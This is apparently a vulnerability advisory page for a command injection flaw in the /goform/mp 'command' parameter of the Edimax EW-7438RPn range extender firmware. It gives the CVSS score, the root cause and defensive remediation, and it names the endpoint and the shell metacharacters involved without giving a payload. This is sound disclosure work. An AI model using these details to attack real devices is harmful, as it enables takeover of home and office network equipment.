EUVD-2025-18776
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
4Description
An OS command injection vulnerability exists in the Edimax EW-7438RPn firmware version 1.13 and prior via the mp.asp form handler. The /goform/mp endpoint improperly handles user-supplied input to the command parameter. An authenticated attacker can inject shell commands using shell metacharacters to achieve arbitrary command execution as the root user. Exploitation evidence was observed by the Shadowserver Foundation on 2024-09-14 UTC.
Analysis
CVE-2025-34024 is an OS command injection vulnerability in Edimax EW-7438RPn wireless range extender firmware versions 1.13 and prior, allowing authenticated attackers to execute arbitrary commands as root via the /goform/mp endpoint. The vulnerability results from improper input validation on the 'command' parameter in the mp.asp form handler, enabling shell metacharacter injection. Active exploitation was observed by the Shadowserver Foundation on 2024-09-14 UTC, indicating real-world threat activity against this device.
Technical Context
The vulnerability exists in the web-based management interface of the Edimax EW-7438RPn (CPE: cpe:2.3:o:edimax:ew-7438rpn_firmware:*:*:*:*:*:*:*:*), specifically in the mp.asp form handler serving the /goform/mp endpoint. The root cause is CWE-78 (Improper Neutralization of Special Elements used in an OS Command), a classic command injection flaw where user-supplied input to the 'command' parameter is passed to a system command execution function without adequate sanitization or escaping of shell metacharacters (e.g., |, ;, &, $(), backticks). The device firmware fails to implement proper input validation, likely using functions such as system(), exec(), or popen() in C-based firmware code without filtering dangerous characters or employing parameterized command execution patterns.
Affected Products
Product: Edimax EW-7438RPn Wireless Range Extender; Affected Versions: Firmware 1.13 and all prior versions; CPE: cpe:2.3:o:edimax:ew-7438rpn_firmware:*:*:*:*:*:*:*:* (all versions up to and including 1.13); Vulnerable Component: /goform/mp endpoint (mp.asp form handler); Attack Surface: Web-based management interface accessible via HTTP/HTTPS on the device (typically port 80/443). No vendor advisory or official patch reference was provided in the source data; users should check Edimax support portal (support.edimax.com) for firmware updates beyond version 1.13.
Remediation
Immediate Actions: (1) If firmware version 1.13 or earlier is in use, check the Edimax support website (https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/wireless_range_extender/ew-7438rpn) for available firmware updates newer than 1.13—apply the latest available firmware immediately; (2) Until patched firmware is available, restrict access to the device's web management interface using network segmentation (firewall rules limiting access to trusted administrative networks only), disable remote management if not required, and change default credentials; (3) Monitor network traffic to /goform/mp endpoint for suspicious patterns (command metacharacters in HTTP parameters); (4) Consider disabling the affected endpoint if the functionality is not critical, or implement reverse-proxy WAF rules to strip metacharacters from the 'command' parameter as a temporary mitigation. Long-term: Upgrade to patched firmware (version post-1.13 when released by Edimax) and audit other Edimax devices for similar command injection vulnerabilities.
Priority Score
Share
External POC / Exploit Code
Leaving vuln.today